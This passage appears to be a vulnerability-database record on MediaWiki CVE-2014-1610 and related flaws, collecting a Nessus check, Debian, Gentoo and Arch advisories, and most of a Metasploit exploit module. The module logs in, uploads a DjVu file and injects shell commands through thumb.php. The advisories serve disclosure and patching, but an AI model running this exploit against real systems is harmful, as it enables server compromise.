attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in\n djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1058981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/127942.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4c47368\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.21.5-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T00:55:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-4572"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 30, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610\nDebian Bug : 729629 706601 742857 742857\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describers the followin\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\n(ID assignment pending)\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2014-03-30T09:33:19", "published": "2014-03-30T09:33:19", "id": "DEBIAN:DSA-2891-1:05758", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00064.html", "title": "[SECURITY] [DSA 2891-1] mediawiki security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:55", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-4572"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610\nDebian Bug : 729629 706601 742857 742857\n\nIn the Mediawiki update issued as DSA 2891-1, a few files were missing\nfrom the package. This update corrects that problem. For reference, the\noriginal advisory text follows.\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describers the followin\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\n(ID assignment pending)\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-03-31T17:07:49", "published": "2014-03-31T17:07:49", "id": "DEBIAN:DSA-2891-2:4C744", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00065.html", "title": "[SECURITY] [DSA 2891-2] mediawiki regression update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:35", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-4572"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-3 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610 CVE-2014-2665\nDebian Bug : 729629 706601 742857 742857\n\nThe Mediawiki update issued as DSA 2891-1 caused regressions. This\nupdate fixes those problems. For reference the original advisory\ntext follows.\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describers the followin\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.15+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u2\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.15+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-04-04T18:03:20", "published": "2014-04-04T18:03:20", "id": "DEBIAN:DSA-2891-3:4C320", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00068.html", "title": "[SECURITY] [DSA 2891-3] mediawiki regression update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:29", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7295"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3046-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nOctober 05, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki\nCVE ID : CVE-2014-7295\n\nIt was reported that MediaWiki, a website engine for collaborative work,\nallowed to load user-created CSS on pages where user-created JavaScript\nis not allowed. A wiki user could be tricked into performing actions by\nmanipulating the interface from CSS, or JavaScript code being executed\nfrom CSS, on security-wise sensitive pages like Special:Preferences and\nSpecial:UserLogin. This update removes the separation of CSS and\nJavaScript module allowance.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.19.20+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:1.19.20+dfsg-1.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2014-10-05T15:32:34", "published": "2014-10-05T15:32:34", "id": "DEBIAN:DSA-3046-1:77CE8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00233.html", "title": "[SECURITY] [DSA 3046-1] mediawiki security update", "type": "debian", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9476", "CVE-2014-9479", "CVE-2014-2244", "CVE-2014-9477", "CVE-2014-5243", "CVE-2014-5241", "CVE-2014-2242", "CVE-2014-9487", "CVE-2014-5242", "CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2014-9277", "CVE-2013-6472", "CVE-2014-9481", "CVE-2014-2243", "CVE-2014-9475", "CVE-2014-9507", "CVE-2013-6452", "CVE-2014-9478", "CVE-2014-2665", "CVE-2014-9276", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295", "CVE-2014-9480"], "edition": 1, "description": "### Background\n\nMediaWiki is a collaborative editing software used by large projects such as Wikipedia. \n\n### Description\n\nMultiple vulnerabilities have been discovered in MediaWiki. Please review the CVE identifiers and MediaWiki announcement referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code with the privileges of the process, create a Denial of Service condition, obtain sensitive information, bypass security restrictions, and inject arbitrary web script or HTML. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MediaWiki 1.23 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.23.8\"\n \n\nAll MediaWiki 1.22 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.22.15\"\n \n\nAll MediaWiki 1.19 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/mediawiki-1.19.23\"", "modified": "2015-02-07T00:00:00", "published": "2015-02-07T00:00:00", "id": "GLSA-201502-04", "href": "https://security.gentoo.org/glsa/201502-04", "type": "gentoo", "title": "MediaWiki: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7295"], "description": "It was discovered that MediaWiki, a wiki engine, was separating the\nallowance of css and js modules resulting in Cross-site Scripting (XSS)\nand UI redressing issues.", "modified": "2014-10-04T00:00:00", "published": "2014-10-04T00:00:00", "id": "ASA-201410-3", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-October/000114.html", "type": "archlinux", "title": "mediawiki: Cross-site Scripting (XSS) and UI redressing", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-01-05T03:27:22", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2014-02-20T00:00:00", "type": "zdt", "title": "MediaWiki Thumb.php Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-20T00:00:00", "id": "1337DAY-ID-21922", "href": "https://0day.today/exploit/description/21922", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\r\\n\",\r\n 'PrependEncoder' => \"php -r \\\"\",\r\n 'AppendEncoder' => \"\\\"\"\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\r\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\r\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\r\n ], self.class)\r\n end\r\n \r\n def get_version(body)\r\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\r\n \r\n unless meta_generator\r\n vprint_status(\"No META Generator tag on #{full_uri}.\")\r\n return nil, nil, nil\r\n end\r\n \r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status(\"#{meta_generator} detected.\")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\r\n \r\n return major, minor, patch\r\n end\r\n \r\n return nil, nil, nil\r\n end\r\n \r\n def check\r\n uri = target_uri.path\r\n \r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n \r\n response = send_request_cgi!(opts)\r\n \r\n if opts['redirect_uri']\r\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\r\n end\r\n \r\n unless response\r\n vprint_status(\"No response from #{full_uri}.\")\r\n return CheckCode::Unknown\r\n end\r\n \r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status(\"#{response.code} response received...\")\r\n \r\n major, minor, patch = get_version(response.body)\r\n \r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n \r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n \r\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\r\n CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n uri = target_uri.path\r\n \r\n print_status(\"Grabbing version and login CSRF token...\")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n })\r\n \r\n unless response\r\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\r\n end\r\n \r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status(\"Windows platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status(\"Nix platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n \r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n \r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n \r\n major, minor, patch = get_version(response.body)\r\n \r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n \r\n session_cookie = response.get_cookies\r\n \r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n \r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\")\r\n else\r\n print_good(\"Retrieved login CSRF token.\")\r\n end\r\n \r\n print_status(\"Attempting to login...\")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n \r\n if login and login.code == 302\r\n print_good(\"Log in successful.\")\r\n else\r\n fail_with(Failure::NoAccess, \"Failed to log in.\")\r\n end\r\n \r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n \r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n \r\n print_status(\"Getting upload CSRF token...\") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n \r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\r\n end\r\n \r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n \r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\")\r\n elsif upload_csrf\r\n print_good(\"Retrieved upload CSRF token.\")\r\n end\r\n \r\n upload_mime = Rex::MIME::Message.new\r\n \r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\r\n file_name = \"#{rand_text_alpha(4)}.djvu\"\r\n \r\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\r\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\r\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\r\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\r\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\r\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\r\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\r\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\r\n post_data = upload_mime.to_s\r\n \r\n print_status(\"Uploading DjVu file #{file_name}...\")\r\n \r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\r\n 'cookie' => auth_cookie\r\n })\r\n \r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good(\"File uploaded to #{location}\")\r\n else\r\n if upload.body.include? 'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\r\n end\r\n end\r\n \r\n payload_request(uri, file_name, my_platform)\r\n end\r\n \r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = \"1)&(#{payload.encoded})&\"\r\n else\r\n trigger = \"1;#{payload.encoded};\"\r\n end\r\n \r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\r\n end\r\n \r\n print_status(\"Sending payload request...\")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n \r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error(\"File: #{file_name} does not exist.\")\r\n elsif r\r\n print_error(\"Received response #{r.code}, exploit probably failed.\")\r\n end\r\n end\r\n \r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n \r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n \r\n if 